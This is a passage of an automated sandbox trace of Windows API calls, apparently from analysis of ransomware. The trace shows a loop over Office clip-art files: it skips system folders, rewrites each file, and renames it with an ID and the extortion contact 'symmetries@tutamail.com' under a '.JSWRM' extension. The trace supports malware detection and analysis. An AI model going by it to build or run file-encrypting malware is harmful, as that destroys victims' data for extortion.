(lpString1="J0152716.WMF", lpString2="system volume information") returned -1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="msocache") returned -1 [0084.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152716.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152716.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152716.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0084.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152716.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152716.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152716.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0084.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0084.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.846] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4580) returned 1 [0084.847] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e0) returned 0x205850 [0084.847] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x11e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x11e0, lpOverlapped=0x0) returned 1 [0084.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.849] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x11e0, lpOverlapped=0x0) returned 1 [0084.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.849] CloseHandle (hObject=0x314) returned 1 [0084.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0084.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0084.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0084.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0084.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0084.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0084.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.850] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0084.851] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe94c4b9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe94c4b9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe998993, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152722.WMF", cAlternateFileName="")) returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2=".") returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="..") returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="...") returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="windows") returned -1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="recovery") returned -1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="perflogs") returned -1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="documents and settings") returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="system volume information") returned -1 [0084.851] lstrcmpiW (lpString1="J0152722.WMF", lpString2="msocache") returned -1 [0084.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152722.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152722.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152722.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0084.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152722.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152722.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152722.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0084.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0084.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0084.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.852] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7020) returned 1 [0084.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b60) returned 0x205850 [0084.853] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b60, lpOverlapped=0x0) returned 1 [0084.861] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.861] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b60, lpOverlapped=0x0) returned 1 [0084.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.861] CloseHandle (hObject=0x314) returned 1 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0084.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0084.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0084.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0084.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0084.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0084.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0084.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0084.862] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9e4dce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ec4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152876.WMF", cAlternateFileName="")) returned 1 [0084.862] lstrcmpiW (lpString1="J0152876.WMF", lpString2=".") returned 1 [0084.862] lstrcmpiW (lpString1="J0152876.WMF", lpString2="..") returned 1 [0084.862] lstrcmpiW (lpString1="J0152876.WMF", lpString2="...") returned 1 [0084.862] lstrcmpiW (lpString1="J0152876.WMF", lpString2="windows") returned -1 [0084.862] lstrcmpiW (lpString1="J0152876.WMF", lpString2="recovery") returned -1 [0084.863] lstrcmpiW (lpString1="J0152876.WMF", lpString2="perflogs") returned -1 [0084.863] lstrcmpiW (lpString1="J0152876.WMF", lpString2="documents and settings") returned 1 [0084.863] lstrcmpiW (lpString1="J0152876.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.863] lstrcmpiW (lpString1="J0152876.WMF", lpString2="system volume information") returned -1 [0084.863] lstrcmpiW (lpString1="J0152876.WMF", lpString2="msocache") returned -1 [0084.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152876.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152876.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152876.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152876.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152876.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152876.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0084.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0084.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.863] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7876) returned 1 [0084.863] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ec0) returned 0x205850 [0084.864] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ec0, lpOverlapped=0x0) returned 1 [0084.866] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.866] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ec0, lpOverlapped=0x0) returned 1 [0084.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.866] CloseHandle (hObject=0x314) returned 1 [0084.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0084.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0084.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0084.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0084.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0084.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0084.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0084.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0084.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0084.868] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe94c4b9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a28, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152878.WMF", cAlternateFileName="")) returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2=".") returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="..") returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="...") returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="windows") returned -1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="recovery") returned -1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="perflogs") returned -1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="documents and settings") returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="system volume information") returned -1 [0084.868] lstrcmpiW (lpString1="J0152878.WMF", lpString2="msocache") returned -1 [0084.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152878.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152878.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152878.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152878.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152878.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152878.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0084.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 